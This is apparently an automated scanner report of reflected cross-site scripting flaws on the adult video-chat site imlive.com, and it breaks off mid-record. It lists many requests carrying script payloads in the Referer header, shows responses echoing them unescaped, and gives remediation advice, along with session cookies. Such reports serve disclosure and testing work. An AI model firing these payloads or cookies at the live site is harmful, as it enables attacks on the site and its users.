Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=7a8e5'><script>alert(1)</script>0a7d7dac8a3
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:46 GMT
Connection: close
Content-Length: 28320
Vary: Accept-Encoding

<html> <head> <meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/live-sex-chats/terminology/&lr=1107816009&ud=0&pe=siteinformation.asp&rf=http://www.google.com/search?hl=en^q=7a8e5'><script>alert(1)</script>0a7d7dac8a3&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46fbb'-alert(1)-'f6926b45b35 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /awardarena/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=46fbb'-alert(1)-'f6926b45b35
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:59 GMT
Connection: close
Content-Length: 24721
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostawards.aspx&he=imlive.com&ul=/awardarena/&rf=http://www.google.com/search?hl=en^q=46fbb'-alert(1)-'f6926b45b35&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f517a'><script>alert(1)</script>7528764405c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /become_celeb.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=f517a'><script>alert(1)</script>7528764405c
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSx9rb%2Be3%2BOTRTIW6m11TETaF6QXi%2ByFiLHg95wp%2FGOR9lSwrZUtExpRjmx1VFU8tmLVZ5WOhWeG2PPzltaaotqhw%3D%3D; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:59 GMT
Connection: close
Content-Length: 13435
Vary: Accept-Encoding
<html> <head> <title>Celebrity Porn Star Sign Up at ImLive</title> <meta name="description" content="Already a Celebrity Porn star? Access millions of ImLive members through celebrity Porn Star L ...[SNIP]... img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/live-sex-chats/pornstars-sign-up/&lr=1107816008&ud=0&pe=become_celeb.asp&rf=http://www.google.com/search?hl=en^q=f517a'><script>alert(1)</script>7528764405c&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6689'-alert(1)-'b778a8b9f7a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /become_host.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=f6689'-alert(1)-'b778a8b9f7a
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:31 GMT
Connection: close
Content-Length: 21060
Vary: Accept-Encoding
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98226'-alert(1)-'ff8df7e9357 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /becomehost.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=98226'-alert(1)-'ff8df7e9357
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:01 GMT
Connection: close
Content-Length: 21060
Vary: Accept-Encoding
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b27c2'><script>alert(1)</script>5c3f838203 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /categoryfs.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=b27c2'><script>alert(1)</script>5c3f838203
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:26 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:26 GMT
Connection: close
Content-Length: 8327
Vary: Accept-Encoding
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4ad1'><script>alert(1)</script>5d132d65cec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /categoryfs.asp?cat=232 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=c4ad1'><script>alert(1)</script>5d132d65cec
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:01 GMT
Connection: close
Content-Length: 19002
Vary: Accept-Encoding
<html> <head> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title> <meta name="d ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryfs.asp?cat=232&lr=1107816009&ud=0&pe=categoryfs.asp&rf=http://www.google.com/search?hl=en^q=c4ad1'><script>alert(1)</script>5d132d65cec&qs=cat=232&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aec77'><script>alert(1)</script>01882fe6e1e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /categoryms.asp?cat=2 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=aec77'><script>alert(1)</script>01882fe6e1e
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:02 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:02 GMT
Connection: close
Content-Length: 21894
Vary: Accept-Encoding
<html> <head> <title>Mysticism & Spirituality Live Video Chat at ImLive</title> <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryms.asp?cat=2&lr=1107816009&ud=0&pe=categoryms.asp&rf=http://www.google.com/search?hl=en^q=aec77'><script>alert(1)</script>01882fe6e1e&qs=cat=2&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 69bb4'><script>alert(1)</script>8751657e5a8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /categoryms.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=69bb4'><script>alert(1)</script>8751657e5a8
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:26 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:26 GMT
Connection: close
Content-Length: 8328
Vary: Accept-Encoding
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5eb49'><script>alert(1)</script>a0a4a130032 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /customerservice.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
